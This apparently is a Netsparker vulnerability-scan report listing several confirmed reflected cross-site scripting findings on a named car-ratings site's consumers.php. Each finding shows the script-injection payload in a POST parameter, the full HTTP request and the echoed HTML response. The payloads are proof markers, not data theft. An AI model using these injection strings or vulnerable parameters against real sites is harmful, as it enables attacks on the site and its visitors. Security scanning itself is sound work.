class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td><td><select name="Make" id="Make" onChange="submit();"><option>---</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="3" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="'"--></style></script><script>netsparker(0x000AD7)</script>" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="C..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST '"--></style></script><script>alert(0x000AD8)</script>
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000AD8)%3c%2fscript%3e&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:48:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a href="clients.php">CLIENTS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="clients.php">Past Clients</a></div> <!--<div class="dropItem"><a href="clients.php">Success Stories</a></div>--> <!--<div class="dropItem"><a href="client_dao_login.php">DAO Login</a></div>--> </div> </div> </div> <!-- PRESS --> <div class="collapsed"> <div class="navItem"><a href="press.php">PRESS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div 
class="dropItem"><a href="press_auto.php">Automotive Press</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> <div class="dropItem"><a href="press_rss.php">RSS Feeds</a></div> </div> </div> </div> </div> </td> <td width="5">&nbsp;</td> </tr></table></div> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center" height="90%"><tr> <td width="5" bgcolor="#CCCCCC" background="images/content_leftshadow.gif">&nbsp;</td> <td width="780" bgcolor="#FFFFFF" valign="top"> <div id="content" class="center_div"> <div style="height:3px;"></div><table width="100%" class="text" cellpadding="5"> <tr> <td width="150" align="left" valign="top"><div class="sidemenu_head">CONSUMERS</div><div class="sidemenu_item"><a href="consumers.php">Car Ratings</a></div><div class="sidemenu_item"><a href="auto_research.php">About Our Ratings</a></div><!--<div class="sidemenu_item"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--><div class="sidemenu_item"><a href="press_auto.php">Automotive Press</a></div><div class="sidemenu_item"><a href="press.php">Press Releases</a></div><div class="sidemenu_item"><a href="press_blogs.php">Blogs</a></div><div class="sidemenu_item"><a href="surveys.php">Survey Login</a></div><div class="sidemenu_head">Sweepstakes</a></div><div class="sidemenu_item"><a href="sweepstakes_winners.php">2010 Contest Winners</a></div><div class="sidemenu_item"><a href="2011_sweepstakes_rules.php">2011 Contest Rules</a></div><br /><br /><div class="sidemenu_head">SITE TOOLS</div><div class="sidemenu_item"><a href="javascript:window.print();"><img src="images/icon_printpage.gif" border="0" height="13" width="12" align="middle">&nbsp; Print This Page</a></div><!--<div class="sidemenu_item"><a href="javascript:emailToAFriend('http://www.strategicvision.com');"><img src="images/icon_email.gif" border="0" height="10" width="12" align="middle">&nbsp; E-mail 
to a Friend</a></div>--><br /><br /><div class="boldtext lighttext">Newsletter Sign-up</div><div class="lighttext">Receive updates from us! Enter your e-mail address:</div><p class="lighttext"> <form name="newsletterSignUp" action="consumers_newsletter_process.php" method="post" class="text"> <input type="text" size="13" maxlength="200" name="email" id="email" class="text" onBlur="trimField(this);" /> <a href="javascript:document.newsletterSignUp.submit();" class="footer">GO</a> </form></p></td> <td align="left" valign="top"> <!-- Start the content --> <div class="pagetitle"><img src="images/pagetitle_dots.gif" width="9" height="10" align="absmiddle" /> <span class="style4">Consumer Automotive Ratings </span></div> <div class="pagetext"> <table width="600" height="148" border="0" cellpadding="0" cellspacing="0" class="text"> <tr> <td height="148" valign="top"> <p><img src="images/3_awards.gif" width="180" height="136" hspace="5" align="right" border="0"><br /> Search hundreds of car ratings obtained by Strategic Vision's renowned New Vehicle Experience Study (NVES) surveys, which gather information from thousands of individuals.</p> <p>Simply choose up to five vehicles that you would like to compare, and click "View Ratings."<br /> <br /> Read more about our automotive research in the <a href="blog.php">Car Blogs</a>!</p> </td> </tr> </table> <table width="600" height="286" cellpadding="0" cellspacing="0"> <tr> <td height="28"><div align="left"><img src="images/car_rating_tab.gif" hspace="1" alt="search car ratings"></div></td> </tr> <tr> <td height="258" style="background: url('images/folder_back.gif') repeat-x;"> <div class="pagetext"> <div class="pagetitle_small" style="font-size:14px">Select your cars:</div> <form name="ratingsSelection" action="consumers.php" method="post"> <table border="0" cellpadding="2" cellspacing="0" class="text"> <tr> <td width="65">Year</td> <td width="135">Manufacturer</td> <td colspan="2" width="200">Model</td> </tr> <tr> <td><select 
name="Year" id="Year" onChange="submit();"><option>---</option><option value="2011">2011</option><option value="2010">2010</option><option value="2009">2009</option><option value="2008">2008</option><option value="2007">2007</option><option value="2006">2006</option><option value="2005">2005</option><option value="2004">2004</option></select></td> </tr> </table> <div class="pagesubtitle">Your picks:</div> <input type="hidden" name="numCars" id="numCars" size="1" value="'"--></style></script><script>netsparker(0x000AD8)</script>" /> <input type="hidden" name="yr1" id="yr1" value="3" /> <input type="hidden" name="mk1" id="mk1" value="3" /> <input type="hidden" name="mo1" id="mo1" value="3" /> <input type="hidden" name="yr2" id="yr2" value="3" /> <input type="hidden" name="mk2" id="mk2" value="3" /> <input type="hidden" name="mo2" id="mo2" value="3" /> <input type="hidden" name="yr3" id="yr3" value="" /> <input type="hidden" name="mk3" id="mk3" value="" /> <input type="hidden" name="mo3" id="mo3" value="" /> <input type="hidden" name="yr4" id="yr4" value="" /> <input type="hidden" name="mk4" id="mk4" value="" /> <input type="hidden" name="mo4" id="mo4" value="" /> <input type="hidden" name="yr5" id="yr5" value="" /> <input type="hidden" name="mk5" id="mk5" value="" /> <input type="hidden" name="mo5" id="mo5" value="" /> </form> <table border="0" class="text boldtext"> <tr><td>1.</td><td width="300"><span id="car1"></span></td><td><span id="car1remove" style="visibility:hidden;"><a href="javascript:removeCarFromList(1);" class="removeCarLink" title="Click here to remove this car from the list">Remove</a></span></td></tr> <tr><td>2.</td><td>&l..
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST '"--></style></script><script>alert(0x000B55)</script>
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B55)%3c%2fscript%3e&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:49:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST '"--></style></script><script>alert(0x000B79)</script>
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B79)%3c%2fscript%3e&mo2=3&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:49:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST '"--></style></script><script>alert(0x000BA9)</script>
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST 3
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000BA9)%3c%2fscript%3e&yr3=3&mk3=3&mo3=3&yr4=3&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:49:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


- /consumers.php

/consumers.php CONFIRMED

http://www.strategicvision.com/consumers.php

Parameters

Parameter Type Value
numCars POST 3
yr1 POST 3
mk1 POST 3
mo1 POST 3
yr2 POST 3
mk2 POST 3
mo2 POST 3
yr3 POST 3
mk3 POST 3
mo3 POST 3
yr4 POST '"--></style></script><script>alert(0x000C1A)</script>
mk4 POST 3
mo4 POST 3
yr5 POST 3
mk5 POST 3
mo5 POST 3

Request

POST /consumers.php HTTP/1.1
Referer: http://www.strategicvision.com/consumers.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.strategicvision.com
Cookie: PHPSESSID=2tjcpjr4h1bgg92c16t9sq4fq0
Content-Length: 183
Expect: 100-continue
Accept-Encoding: gzip, deflate

numCars=3&yr1=3&mk1=3&mo1=3&yr2=3&mk2=3&mo2=3&yr3=3&mk3=3&mo3=3&yr4='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000C1A)%3c%2fscript%3e&mk4=3&mo4=3&yr5=3&mk5=3&mo5=3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Jul 2011 02:50:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html


<html xmlns="http://www.w3.org/1999/xhtml"><head><title>Strategic Vision - Consumer Automotive Ratings</title><script type="text/javascript" language="JavaScript" src="scripts/ratings.js"></script><style type="text/css"><!--.style4 {color: #D9740F}--></style><!--META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"--><link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" /><link rel="stylesheet" href="format.css" type="text/css" /><link rel="stylesheet" href="navbar.css" type="text/css" /><script language="JavaScript" type="text/javascript" src="scripts/functions.js"></script><script language="JavaScript" type="text/javascript" src="scripts/navbar.js"></script></head><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1931555-7");pageTracker._trackPageview();} catch(err) {}</script><meta name="google-site-verification" content="co3cp8LCCaiJv7xvKXlDyD1GnS4aS8p2ytrk5iiNcxk" /><body style="background-color: #CCCCCC;"> <a name="top"></a> <div id="pagehead"> <table border="0" cellpadding="0" cellspacing="0" width="790" height="71" align="center" class="text"> <tr> <td bgcolor="#003466">&nbsp;</td> <td align="left" width="480" background="images/pagehead_highlight.png"> <div id="logo"><a href="index.php"><img src="images/sv_logo.png" alt="Strategic Vision" width="195" height="70" border="0" title="Strategic Vision" /></a></div> </td> <td valign="bottom" align="right" width="300" class="userinfo" background="images/pagehead_highlight.png"> <p> &nbsp;</p> </td> <td bgcolor="#003466">&nbsp;</td> </tr> </table></div> <center> <div id="toolbar" style="z-index=1;"> <table border="0" cellpadding="0" cellspacing="0" width="790" align="center"><tr> <td width="5">&nbsp;</td> 
<td width="780"> <div id="topNav" class="navBar"> <!-- HOME --> <div class="collapsed"> <div class="navItem"><a href="index.php">HOME</a></div> </div> <!-- CONSUMERS --> <div class="collapsed"> <div class="navItem"><a href="consumers.php">CONSUMERS</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="ratings.php">Automotive Ratings</a></div> <div class="dropItem"><a href="auto_research.php">About our Ratings</a></div> <!--<div class="dropItem"><a href="consumers_carbuyingtips.php">Car Buying Tips</a></div>--> <div class="dropItem"><a href="surveys.php">Surveys</a></div> <div class="dropItem"><a href="press_blogs.php">Blogs</a></div> <div class="dropItem"><a href="press.php">Press Releases</a></div> <div class="dropItem"><a href="sweepstakes_winners.php">Sweepstakes</a></div> </div> </div> </div> <!-- RESEARCH --> <div class="collapsed"> <div class="navItem"><a href="research.php">RESEARCH</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="auto_research.php">Automotive</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="auto_tqa.php">Total Quality</a></div> <div class="dropItem"><a href="auto_tvi.php">Total Value</a></div> <div class="dropItem"><a href="auto_delight.php">Delight</a></div> <div class="dropItem"><a href="auto_pim.php">Problem Impact</a></div> <div class="dropItem"><a href="auto_ethnic_report_2006.php">Ethnic Report</a></div> </div> </div> <div class="dropItem"><a href="govt_research.php">Government</a></div> <div class="dropItem"><a href="jury_research.php">Jury</a></div> <div class="dropItem"><a href="org_intervention.php">Organizational Intervention</a></div> <div class="dropItem"><a href="via_research.php">Values In America</a></div> <div class="rule"></div> <div class="dropItem"><a href="method.php">ValueCentered Method</a></div> </div> </div> </div> <!-- RATINGS --> <div 
class="collapsed"> <div class="navItem"><a href="services.php">SERVICES</a></div> </div> <!-- METHOD --> <div class="collapsed"> <div class="navItem"><a href="method.php">METHOD</a></div> </div> <!-- COMPANY --> <div class="collapsed"> <div class="navItem"><a href="company.php">COMPANY</a></div> <div class="dropContainer"> <div class="dropMenu"> <div class="dropItem"><a href="team.php">Team</a> <img class="tier2Arrow" src="images/tier2Arrow.gif" width="7" height="9" border="0"> <div class="dropMenu2"> <div class="dropItem"><a href="team.php?person=1">Dr. Darrel Edwards</a></div> <div class="dropItem"><a href="team.php?person=8">J. Susan Johnson</a></div><div class="dropItem"><a href="team.php?person=9">Sharon D. Shedroff</a></div><div class="dropItem"><a href="team.php?person=11">Alexander H. Edwards</a></div><div class="dropItem"><a href="team.php?person=12">Alex Hare</a></div><div class="dropItem"><a href="team.php?person=13">Charles Borough</a></div><div class="dropItem"><a href="team.php?person=14">Christopher Chaney</a></div><div class="dropItem"><a href="team.php?person=30">Margo Jay</a></div> </div> </div> <div class="dropItem"><a href="clients.php">Clients</a></div> <div class="dropItem"><a href="charity.php">Charity</a></div> <div class="rule"></div> <div class="dropItem"><a href="press_contacts.php">Press Contacts</a></div> </div> </div> </div> <!-- CLIENTS --> <div class="collapsed"> <div class="navItem"><a 